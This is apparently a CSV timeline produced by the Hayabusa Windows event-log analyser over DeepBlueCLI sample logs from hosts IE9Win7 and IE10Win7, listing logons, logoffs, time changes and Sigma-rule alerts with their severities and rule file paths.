2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x12048  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x12070  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x131c3  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x13216  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x36aed  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x36b1d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x11c02  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x11c32  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x170f5  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x17125  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1ac86  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b245  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1a23a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1a265  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1e056  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1e3c9  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x6831f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x6832b  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1dc1e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1ee41  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
